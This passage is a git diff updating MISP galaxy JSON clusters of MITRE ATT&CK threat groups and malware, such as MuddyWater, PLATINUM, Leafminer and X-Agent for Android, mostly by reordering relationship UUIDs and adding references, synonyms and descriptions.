+12535,69 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0c8465c0-d0b4-4670-992e-4eee8d7ff952", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "7113eaa5-ba79-4fb3-b68a-398ee9cd698e", @@ -10448,7 +12617,7 @@ }, "related": [ { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10461,6 +12630,13 @@ ], "type": "uses" }, + { + "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ @@ -10468,20 +12644,6 @@ ], "type": "uses" }, - { - "dest-uuid": "d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -10490,7 +12652,21 @@ "type": "uses" }, { - "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10504,7 +12680,7 @@ "type": "uses" }, { - "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", + "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10518,7 +12694,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10534,9 +12710,9 @@ "external_id": "G0066", "refs": [ "https://attack.mitre.org/groups/G0066", + "http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", - "https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China", - "http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html" + "https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China" ], "synonyms": [ "Elderwood", @@ -10560,27 +12736,6 @@ ], "type": "uses" }, - { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4d8a2d6-c684-453a-8a14-cf4a94f755c5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ @@ -10588,20 +12743,6 @@ ], "type": "uses" }, - { - "dest-uuid": "73a4793a-ce55-4159-b2a6-208ef29b326f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e811ff6a-4cef-4856-a6ae-a7daf9ed39ae", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "tags": [ @@ -10609,20 +12750,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "48523614-309e-43bf-a2b8-705c2b45d7b2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e9e9bfe2-76f4-4870-a2a1-b7af89808613", "tags": [ @@ -10630,13 +12757,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "79499993-a8d6-45eb-b343-bf58dea5bdde", "tags": [ @@ -10645,7 +12765,28 @@ "type": "uses" }, { - "dest-uuid": "c251e4a5-9a2e-4166-8e42-442af75c3b9a", + "dest-uuid": "48523614-309e-43bf-a2b8-705c2b45d7b2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10659,7 +12800,21 @@ "type": "uses" }, { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "dest-uuid": "73a4793a-ce55-4159-b2a6-208ef29b326f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c251e4a5-9a2e-4166-8e42-442af75c3b9a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10678,6 +12833,27 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "f4d8a2d6-c684-453a-8a14-cf4a94f755c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e811ff6a-4cef-4856-a6ae-a7daf9ed39ae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "03506554-5f37-4f8f-9ce4-0e9f01a1b484", @@ -10696,27 +12872,6 @@ ] }, "related": [ - { - "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ @@ -10731,12 +12886,33 @@ ], "type": "uses" }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "d69e568e-9ac8-4c08-b32c-d93b43ba9172", @@ -10747,8 +12923,7 @@ "meta": { "external_id": "G0068", "refs": [ - "https://attack.mitre.org/groups/G0068", - "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + "https://attack.mitre.org/groups/G0068" ], "synonyms": [ "PLATINUM" @@ -10783,6 +12958,34 @@ ], "type": "uses" }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e170995d-4f61-4f17-b60e-04f9a06ee517", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -10791,14 +12994,21 @@ "type": "uses" }, { - "dest-uuid": "de6cb631-52f6-4169-a73b-7965390b0c30", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "de6cb631-52f6-4169-a73b-7965390b0c30", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10819,35 +13029,7 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10861,7 +13043,7 @@ "type": "uses" }, { - "dest-uuid": "e170995d-4f61-4f17-b60e-04f9a06ee517", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10872,16 +13054,19 @@ "value": "PLATINUM - G0068" }, { - "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but is believed to be a distinct group motivated by espionage. (Citation: Unit 42 MuddyWater Nov 2017)", + "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but the group is believed to be a distinct group possibly motivated by espionage.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)", "meta": { "external_id": "G0069", "refs": [ "https://attack.mitre.org/groups/G0069", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html" ], "synonyms": [ "MuddyWater", + "Seedworm", "TEMP.Zagros" ] }, @@ -10900,6 +13085,34 @@ ], "type": "uses" }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ @@ -10907,6 +13120,69 @@ ], "type": "uses" }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e8545794-b98c-492b-a5b3-4b5a02682e37", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7d6f590f-544b-45b4-9a42-e0805f342af3", "tags": [ @@ -10922,56 +13198,70 @@ "type": "uses" }, { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e8545794-b98c-492b-a5b3-4b5a02682e37", + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10983,6 +13273,34 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cf7b3a06-8b42-4c33-bbe9-012120027925", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "269e8108-68c6-4f99-b911-14b2e765dec2", @@ -10994,10 +13312,12 @@ "external_id": "G0077", "refs": [ "https://attack.mitre.org/groups/G0077", - "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://www.dragos.com/blog/20180802Raspite.html" ], "synonyms": [ - "Leafminer" + "Leafminer", + "Raspite" ] }, "related": [ @@ -11015,34 +13335,6 @@ ], "type": "uses" }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ @@ -11050,6 +13342,13 @@ ], "type": "uses" }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", "tags": [ @@ -11058,14 +13357,14 @@ "type": "uses" }, { - "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11078,6 +13377,34 @@ ], "type": "uses" }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ @@ -11086,7 +13413,7 @@ "type": "uses" }, { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "dest-uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11117,6 +13444,13 @@ ], "type": "uses" }, + { + "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", "tags": [ @@ -11125,21 +13459,7 @@ "type": "uses" }, { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8ec6e3b4-b06d-4805-b6aa-af916acc2122", + "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11153,14 +13473,21 @@ "type": "uses" }, { - "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8ec6e3b4-b06d-4805-b6aa-af916acc2122", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11171,5 +13498,5 @@ "value": "DarkHydrus - G0079" } ], - "version": 13 + "version": 15 } diff --git a/clusters/mitre-malware.json b/clusters/mitre-malware.json index 9bbca20..bc1fbae 100644 --- a/clusters/mitre-malware.json +++ b/clusters/mitre-malware.json @@ -41,7 +41,7 @@ "value": "Hacking Team UEFI Rootkit - S0047" }, { - "description": "[X-Agent for Android](https://attack.mitre.org/software/S0314) is Android malware that was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data on where the victim device was used, and therefore could likely indicate the potential location of Ukrainian artillery. (Citation: CrowdStrike-Android) Is it tracked separately from the [Windows and Linux versions of X-Agent](https://attack.mitre.org/software/S0023).", + "description": "[X-Agent for Android](https://attack.mitre.org/software/S0314) is Android malware that was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data on where the victim device was used, and therefore could likely indicate the potential location of Ukrainian artillery. (Citation: CrowdStrike-Android) Is it tracked separately from the [CHOPSTICK](https://attack.mitre.org/software/S0023).", "meta": { "external_id": "S0314", "mitre_platforms": [ @@ -141,20 +141,6 @@ ], "type": "uses" }, - { - "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "d9db3d46-66ca-44b4-9daa-1ef97cb7465a", "tags": [ @@ -163,14 +149,28 @@ "type": "uses" }, { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "dest-uuid": "62adb627-f647-498e-b4cc-41499361bacb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -184,7 +184,7 @@ "type": "uses" }, { - "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -205,14 +205,14 @@ "type": "uses" }, { - "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", + "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "62adb627-f647-498e-b4cc-41499361bacb", + "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -294,27 +294,6 @@ ], "type": "uses" }, - { - "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", "tags": [ @@ -322,41 +301,6 @@ ], "type": "uses" }, - { - "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": 